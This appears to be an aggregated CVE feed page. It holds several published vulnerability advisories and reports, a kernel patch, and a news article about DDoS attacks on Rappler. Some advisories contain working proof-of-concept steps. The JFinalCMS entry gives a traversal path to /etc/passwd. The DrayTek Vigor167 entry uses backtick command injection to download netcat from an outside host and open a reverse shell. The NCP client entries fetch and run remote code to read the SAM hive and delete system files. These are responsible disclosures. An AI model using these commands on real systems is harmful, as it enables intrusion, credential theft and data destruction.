JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter.

在/common/down/file路由功能下，可以对参数fileKey设计带有恶意性质内容的文件名实现目录穿越，从而下载已知目录内的任意已知文件名，且该行为并不需要进行登录。

    poc:
    Linux:   /../../../../../../../etc/passwd
    Windows:  /../../../../../../../test.txt （test.txt为测试用的在根目录下的文件）

CVE-2023-50449: JFinalCMS存在未授权目录遍历漏洞 · Issue #I7WGC6 · 樱木/JFinalCMS - Gitee.com

sec_attest_info in drivers/accel/habanalabs/common/habanalabs_ioctl.c in the Linux kernel through 6.6.5 allows an information leak to user space because info->pad0 is not initialized.

**Xingyuan Mo** hdthky0 at gmail.com  
_Wed Nov 22 10:49:40 UTC 2023_

*   Previous message (by thread): \[PATCH\] drm/i915/psr: Fix unsigned expression compared with zero
*   Next message (by thread): \[PATCH\] drm/amdgpu: Fix cat debugfs amdgpu\_regs\_didt causes kernel null pointer
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

This function may copy the pad0 field of struct hl\_info\_sec\_attest to
user mode which has not been initialized, resulting in leakage of kernel
heap data to user mode. To prevent this, just zero out the pad0 field
before copying it to user mode.

Fixes: 0c88760f8f5e ("habanalabs/gaudi2: add secured attestation info uapi")
Signed-off-by: Xingyuan Mo <hdthky0 at gmail.com\>
---
 drivers/accel/habanalabs/common/habanalabs\_ioctl.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/accel/habanalabs/common/habanalabs\_ioctl.c b/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
index 8ef36effb95b..9e3feb7ad5e5 100644
--- a/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
+++ b/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
@@ -707,6 +707,7 @@ static int sec\_attest\_info(struct hl\_fpriv \*hpriv, struct hl\_info\_args \*args)
 	memcpy(&info->public\_data, &sec\_attest\_info->public\_data, sizeof(info->public\_data));
 	memcpy(&info->certificate, &sec\_attest\_info->certificate, sizeof(info->certificate));
 	memcpy(&info->quote\_sig, &sec\_attest\_info->quote\_sig, sizeof(info->quote\_sig));
+	memset(&info->pad0, 0, sizeof(info->pad0));
 
 	rc = copy\_to\_user(out, info,
 				min\_t(size\_t, max\_size, sizeof(\*info))) ? -EFAULT : 0;
-- 
2.43.0

*   Previous message (by thread): \[PATCH\] drm/i915/psr: Fix unsigned expression compared with zero
*   Next message (by thread): \[PATCH\] drm/amdgpu: Fix cat debugfs amdgpu\_regs\_didt causes kernel null pointer
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the dri-devel mailing list

CVE-2023-50431: [PATCH] habanalabs: fix information leak in sec_attest_info()

The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker's fingerprint.

CVE-2023-50430: A Touch of Pwn - Part I

In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023.

CVE-2023-50428: Common Vulnerabilities and Exposures - Bitcoin Wiki

SyncTrayzor 1.1.29 enables CEF (Chromium Embedded Framework) remote debugging, allowing a local attacker to control the application.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-46899: Remove RemoteDebuggingPort for release builds · Issue #666 · canton7/SyncTrayzor

By Waqas
On Thursday, November 30, 2023, Rappler, the prominent online media giant based in the Philippines, fell victim to a relentless series of Distributed Denial of Service (DDoS) attacks.
This is a post from HackRead.com Read the original post: DDoS Attacks on Rappler Linked to Proxy Service Providers in US and Russia

Qurium, the Swedish media foundation and human rights watchdog leading the investigation into these DDoS attacks implicates FineProxy and RayoByte in facilitating the attacks.

On November 30, 2023, Rappler, the leading digital media company in the Philippines, found itself under a massive series of crippling DDoS attacks (Distributed Denial of Service Attacks).

Qurium, the Swedish media foundation and human rights watchdog, leading the investigation into the recent DDoS attacks, has exposed the alleged participation of two major proxy providers, FineProxy and RayoByte, in facilitating the series of crippling DDoS attacks.

In a blog post published by Rappler, On December 5, 2023, the company experienced an unprecedented surge of over 40 million requests to its homepage within a span of one hour. The investigation, conducted by Qurium, analyzed 90GB of access log data provided by Rappler and traced the malicious activity back to FineProxy and RayoByte.

****FineProxy from Russia****

According to a report published by Qurium, FineProxy, a Russian-based proxy infrastructure, has a history of involvement in numerous DDoS attacks against various organizations.

Despite being approached multiple times by Qurium, FineProxy showed little interest in resolving the issue and instead offered to disclose the client responsible for the attacks on the condition that Qurium remove all forensic reports involving their name.

For a comprehensive understanding of the details provided in the screenshot above, delve into Qurium’s report outlining FineProxy’s infrastructure and a documented timeline of its business model.

****RayoByte from the United States****

RayoByte, based in Nebraska and operating under Sprious LLC, claims to be an “ethical proxy provider.” However, evidence collected by Qurium suggests otherwise, as the investigation revealed the use of fake geolocations in their networks and a willingness to engage in unethical practices.

It is worth noting that during the DDoS attack on Rappler, traffic peaked at a staggering 250,000 requests per second. The assailants targeted Rappler’s website with multiple waves of attacks, originating from both residential and data center connections.

Qurium’s investigation exposed the complex web of networks associated with FineProxy and RayoByte. Both proxy providers, despite claims of ethical standards, have allegedly tampered with geolocation data, associating their networks with fake locations to attract clients.

The alleged fake locations advertised by RayoByte (Screenshot taken from a separate report published by Qurium available here.

The report concludes that both FineProxy and RayoByte have designed their infrastructures to accommodate almost unlimited connections, enabling customers to automate tasks such as scraping and flooding sites with backlinks at high speeds. This focus on serving clients engaging in potentially abusive SEO practices has led to the use of their infrastructures for conducting DDoS attacks.

****Qurium****

For readers’ information, Qurium specializes in investigating DDoS attacks with a mission to identify perpetrators and ensure accountability. The organization has been actively investigating the recent surge in DDoS attacks targeting media and human rights organizations in the Philippines.

Qurium’s noteworthy track record includes investigations into significant cyber incidents. This includes their examination of weeks-long DDoS attacks on the Philippines Human Rights watchdog ‘Karapatan.’

In November 2023, Qurium exposed Chinese scammers exploiting cloned websites within an extensive gambling network. Furthermore, in September 2019, the organization released a report shedding light on how an illegal prostitution ring disrupted the Internet in Kazakhstan.

Nevertheless, the troubling findings call into question the responsibility and moral guidelines of proxy providers, which seem to shield users involved in harmful actions. The disclosures concerning the absence of supervision and accountability among these providers are troubling, provoking deep concerns about their function in protecting the Internet.

1.  **List of Proxy IPs Exposed to Block Killnet’s DDoS Bots**
2.  **Cloudflare thwarts largest reported HTTP DDoS attack**
3.  **48 DDoS-hiring Services Busted by FBI in Major Sweep**
4.  **UK Royal Family Website Hit by DDoS Attack from Russian KillNet**
5.  **Kaspersky Reveals Alarming IoT Threats and Dark Web DDoS Boom**
6.  **Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US**

DDoS Attacks on Rappler Linked to Proxy Service Providers in US and Russia

An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-023 Product: Vigor167 Manufacturer: DrayTek Affected Version(s): 5.2.2 Tested Version(s): 5.2.2 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2023-09-22 Solution Date: 2023-11-16 Public Disclosure: 2023-12-06 CVE Reference: CVE-2023-47254 Author of Advisory: Fabian Krone, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Vigor167 is a VDSL2 35b Supervectoring Modem. The manufacturer describes the product as follows (see \[1\]): "Vigor167 is a VDSL2 35b modem/router." Due to missing input validation, the command-line interface of the device is vulnerable to an OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Vigor167 has a command-line interface available via both Telnet and SSH. This interface requires a login with any account available in the web interface. This also includes accounts which were denied every access according to their group settings. Afterward, a limited set of commands is available to the user. The ping command present allows injecting commands which are then executed on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Commands can be injected with backticks (\`\`). The current working directory can be printed out with the following command: vigor> exec ping \`pwd\` ping: /tmp: Unknown host Another possibility is to wrap the OS command in parentheses following a dollar sign like $(pwd). The available commands are very limited. For example, only a small fraction of the standard output from the injected commands is displayed. Furthermore, space characters lead to evaluation errors. In order to achieve a full reverse shell, some of BusyBox's internal commands can be used. A TFTP server is hosted as preparation on a computer which is reachable by Vigor167 over the network. A statically compiled version of Netcat\[2\] is hosted on the TFTP server. First, the operating system of Vigor167 is instructed to download the file: vigor> exec ping \`busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host ${IFS} is a POSIX variable that contains the field separator and serves as replacement for the space character. Then, the executable flag is set on the transferred Netcat binary: vigor> exec ping \`chmod${IFS}+x${IFS}/tmp/netcat\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host On the computer hosting the TFTP server, a Netcat listener is opened. Then, a reverse shell can be spawned: vigor> exec ping \`/tmp/netcat${IFS}192.168.100.5${IFS}9001${IFS}-e${IFS}ash\` The reverse shell is opened to the targeted host: Connection from 192.168.100.1:43354 sh: turning off NDELAY mode pwd /tmp Vigor167 was used in modem mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the modem's firmware to version 5.2.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-07-30: Vulnerability discovered 2023-09-22: Vulnerability reported to manufacturer 2023-11-16: Patch released by manufacturer 2023-12-06: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Vigor167 https://www.draytek.com/products/vigor167 \[2\] Statically compiled MIPS32 Netcat https://github.com/darkerego/mips-binaries/blob/master/netcat \[3\] SySS Security Advisory SYSS-2023-023 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-023.txt \[4\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Fabian Krone of SySS GmbH. E-Mail: fabian.krone@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian\_Krone.asc Key ID: 0xBFDF30ABD10EA0F4 Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEECt7Sqq4nfdqo8MBRv98wq9EOoPQFAmVouRMACgkQv98wq9EO oPRkjhAAnkZCXYM9lqXIbN+pGZoA2Zv93z8JXv34vIhCahv1G47ocJ0L7kLb7KNz +EbLTEnoh9Kxukw7tjNV6zvHRhav2o5KQBaelgGyCAmgtcKp30eCkN0sO4ocBqm5 wBYbYxVzOk6+aMOxIR6B496lT5AvFtzHXeCuwm4Vewpv/v7L78ixA1vnD+cjJuHq BdA/IYxrQKUEeZBlBqNM1WFe2AUxhaxGnskBrQtnZcblrJwLj3CY4UCbAehFCN29 p0iw6ntnMfpSP85nwM7mNIQo1UFWvA3Dnx6sVK7LjokX+bBAgrjjklxUdZoN1exa htT12p6lE9UNWteFt0xkgdMRkTM48CUsDpiQORIRTbb20Haz9byNTieH3UxX/OLE mU/D/BhfX4F55f0Yxlz/kJ+5hLEv4EUUIfuM4uM6vntH1E8Y/FGMxdpWVqtvCU64 U6mr52/ZLWKxyyp1+qZn2UpkP9zntO8sNUd2Yt3TqpNfOydJGNff//A5gqPkJy6B s1bZEYNWN6zpkkVukFT+EIjQHyA8OaTud8TUmo0uuvN240S74yqKpb7czaAjdOwn c5h6IlqEYu70lpnEc2d9UFRN4nGJ/NiLuimDbFjaqtjzGa+rDFNNSHDvS8jN+tN5 bgZ6SPy+mXNh07dqET/SVaI8P/yIZmNIENtNrW7z6fbr6F+aKfk= =7izf -----END PGP SIGNATURE-----

CVE-2023-47254

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read registry information of the operating system by creating a symbolic link.

**usd-2022-0005 | NCP Secure Enterprise Client - Insecure Registry Export**

**Advisory ID:** usd-2022-0005  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Insecure Registry Export  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _Windows Registry_ is a central storage location for configuration settings on the _Windows_ operating system. Data that is stored  
within the _Windows Registry_ is utilized by several different components, like desktop applications, services, device drivers and also  
the kernel itself. Several locations within the _Windows Registry_ are known to contain sensitive information. The probably most well  
known example is the **HKLM\\SAM** hive, that stores hashed credentials of local user accounts.

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. Within this diagnostic information, the _NCP Secure Enterprise_ client also exports information  
from the _Windows Registry_. During this export, _Registry symbolic links_ are followed and may allow to redirect the export to an arbitrary  
location within the _Windows Registry_.

For such an attack to work, a low privileged user accounts need to be able to create _Registry symbolic links_ within the exported _Registry  
keys_. In the case of the _NCP Secure Enterprise_ client, this is possible, since the client exports all keys under **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services\*_recursively. On a default installation of_ Windows_, this_ Registry key _usually contains some keys where low privileged user accounts  
can create_ subkeys_. Newly created_ subkeys _are owned by the creating user and it is possible to create_ Registry symbolic links_within them that point to arbitrary_ Registry _locations. Since the_ symlink\* originates from a trusted** HKLM __hive, it is not restricted  
by_ Microsoft's_ protection features for _Registry symbolic links_.

**Proof of Concept**

The first step is finding a _Registry key_ within **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services** that is writable for low privileged  
user accounts. Corresponding keys might vary for different installations, but on our test systems it was always possible to find at least  
one such key. In the following we use the key **HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment** which seems to be available and allows  
the creation of _subkeys_ on most installations.

Within this _Registry key_ we now create a _symbolic link_ pointing to **HKLM\\SAM**

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> \[de.usd.SharpLink.RegistryLink\]::CreateKey("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB")  
\[+\] Creating registry key: HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB  
\[+\] Registry key was successfully created.  
PS C:\\> $r \= New-Object de.usd.SharpLink.RegistryLink("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK", "HKLM\\SAM")  
PS C:\\> $r.Open()  
\[+\] Creating registry key: \\Registry\\Machine\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK  
\[+\] Assigning symlink property pointing to: \\Registry\\Machine\\SAM  
\[+\] RegistryLink setup successful!

After the _Registry symbolic link_ is setup, one can start the _Support Assistant_ using the _NCP Secure Enterprise_ client tray icon  
(upper right inside the _Help_ menu). After the _Support Assistant_ was started, it collects support information from the operating system:

The collected files can be viewed either from the _Support Assistant_ directly or by inspecting them in **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*\*.  
Within the** Services.reg **file, one can find the export of the** HKLM\\SAM\*\* hive:

**Fix**

During the collection of support information from the operating system, the _NCP Secure Enterprise_ client software should impersonate  
the user that started the _Support Assistant_. This way, only information that the invoking user is allowed to read can be obtained.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28871: Security Advisory usd-2022-0005 | usd HeroLab

Heap Buffer Overflow vulnerability in GPAC version 2.3-DEV-rev617-g671976fcc-master, allows attackers to execute arbitrary code and cause a denial of service (DoS) via str2ulong class in src/media_tools/avilib.c in gpac/MP4Box.

**heap-buffer-overflow in str2ulong src/media\_tools/avilib.c:137:16 in gpac/MP4Box****Description**

Heap-buffer-overflow in MP4Box.  
#0 0x7ffff694c441 in str2ulong /afltest/gpac2/src/media\_tools/avilib.c:137:16

**Version**

MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:
        GPAC Filters: https://doi.org/10.1145/3339825.3394929
        GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SSL GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_JPEG GPAC\_HAS\_PNG GPAC\_HAS\_FFMPEG GPAC\_HAS\_VORBIS GPAC\_HAS\_LINUX\_DVB

**ASAN Log**

./MP4Box -dash 500 -check-xml -dm2ts -bin -out /dev/null poc6gpac

\=================================================================
==1173259==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001a330 at pc 0x7ffff694c442 bp 0x7ffffffeea70 sp 0x7ffffffeea68
READ of size 1 at 0x62100001a330 thread T0
    #0 0x7ffff694c441 in str2ulong /afltest/gpac2/src/media\_tools/avilib.c:137:16
    #1 0x7ffff694c441 in avi\_parse\_input\_file /afltest/gpac2/src/media\_tools/avilib.c:2004:9
    #2 0x7ffff694220a in AVI\_open\_input\_file /afltest/gpac2/src/media\_tools/avilib.c:1840:2
    #3 0x7ffff6f9d3f3 in avidmx\_process /afltest/gpac2/src/filters/dmx\_avi.c:492:14
    #4 0x7ffff6e8f502 in gf\_filter\_process\_task /afltest/gpac2/src/filter\_core/filter.c:2971:7
    #5 0x7ffff6e62ee9 in gf\_fs\_thread\_proc /afltest/gpac2/src/filter\_core/filter\_session.c:2105:3
    #6 0x7ffff6e6193d in gf\_fs\_run /afltest/gpac2/src/filter\_core/filter\_session.c:2405:3
    #7 0x7ffff67a625c in gf\_dasher\_process /afltest/gpac2/src/media\_tools/dash\_segmenter.c:1236:6
    #8 0x50dfc7 in do\_dash /afltest/gpac2/applications/mp4box/mp4box.c:4831:15
    #9 0x50dfc7 in mp4box\_main /afltest/gpac2/applications/mp4box/mp4box.c:6245:7
    #10 0x7ffff58cb082 in \_\_libc\_start\_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x42adad in \_start (/afltest/gpac2/bin/gcc/MP4Box+0x42adad)

0x62100001a330 is located 0 bytes to the right of 4656-byte region \[0x621000019100,0x62100001a330)
allocated by thread T0 here:
    #0 0x4a34ed in malloc (/afltest/gpac2/bin/gcc/MP4Box+0x4a34ed)
    #1 0x7ffff6942aae in avi\_parse\_input\_file /afltest/gpac2/src/media\_tools/avilib.c:1944:35
    #2 0x7ffff694220a in AVI\_open\_input\_file /afltest/gpac2/src/media\_tools/avilib.c:1840:2

SUMMARY: AddressSanitizer: heap-buffer-overflow /afltest/gpac2/src/media\_tools/avilib.c:137:16 in str2ulong
Shadow bytes around the buggy address:
  0x0c427fffb410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c427fffb460: 00 00 00 00 00 00\[fa\]fa fa fa fa fa fa fa fa fa
  0x0c427fffb470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb4a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb4b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==1173259\==ABORTING

**Reproduction**

git clone https://github.com/gpac/gpac.git
cd gpac
./configure --enable-sanitizer
make -j24

./bin/gcc/MP4Box -dash 500 -check-xml -dm2ts -bin -out /dev/null poc6gpac

_Thanks_ _for_ _your_ _time_!

**PoC**

poc6gpac: poc6gpac.zip

****Impact****

This vulnerability is capable of causing crashes, or possible code execution.

**Reference**

https://github.com/gpac/gpac

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang

Song Jiaxuan

CVE-2023-46932: heap-buffer-overflow in str2ulong src/media_tools/avilib.c:137:16 in gpac/MP4Box · Issue #2669 · gpac/gpac

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to delete arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0002 | NCP Secure Enterprise Client - Arbitrary File Delete**

**Advisory ID:** usd-2022-0002  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Delete  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Description**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. The corresponding information is gathered by high privileged services and stored within the directory  
__C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_. Since this directory is fully user controlled, a low privileged user can create_ symbolic links_within it. This can be used to trick the_ NCP Secure Enterprise\* client to delete arbitrary files on the operating system.

**Proof of Concept**

To perform the arbitrary file delete, the following steps are necessary:

1.  Start the _Support Assistant_ and wait until all diagnostic information has been collected.
2.  Create a _symbolic link_ that originates from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
    and points to the targeted file.
3.  Abort the _Support Assistant_ and restart it.

After these steps have been executed, the targeted file should be deleted. In the following, we demonstrate  
each of the above mentioned steps.

First we start the _Support Assistant_ by using the tray icon of the _NCP Secure Enterprise_ client. The _Support Assistant_  
feature can be found in the upper right of the graphical user interface within the _Help_ menu.

After the diagnostic information has been collected, we create a _symbolic link_ pointing from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
to the well known **C:\\Windows\\win.ini** file.

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\win.ini")  
PS C:\\> $s.Open()  
\[!\] Junction directory C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport is not empty. Delete files? (y/N) y  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\win.ini  
\[+\] Symlink setup successfully.

Now the _Support Assistant_ is aborted and restarted. After this action has been performed, the **win.ini** does no longer exist.

PS C:\\> dir C:\\Windows\\win.ini  
dir : Der Pfad "C:\\Windows\\win.ini" kann nicht gefunden werden, da er nicht vorhanden ist.  
In Zeile:1 Zeichen:1  
+ dir C:\\Windows\\win.ini  
+ \~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\\Windows\\win.ini:String) \[Get-ChildItem\], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

**Fix**

It is assumed that the _NCP Secure Enterprise_ client checks for already existing diagnostic files before starting  
the _Support Assistant_ and attempts to delete them. This delete operation occurs with high privileges, resulting  
in the vulnerability. Instead, the delete operation should be performed while impersonating the invoking user account.  
This prevents the deletion of files the invoking user has insufficient permissions for.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   2022-02-02 First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is realesed
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

Tag

#git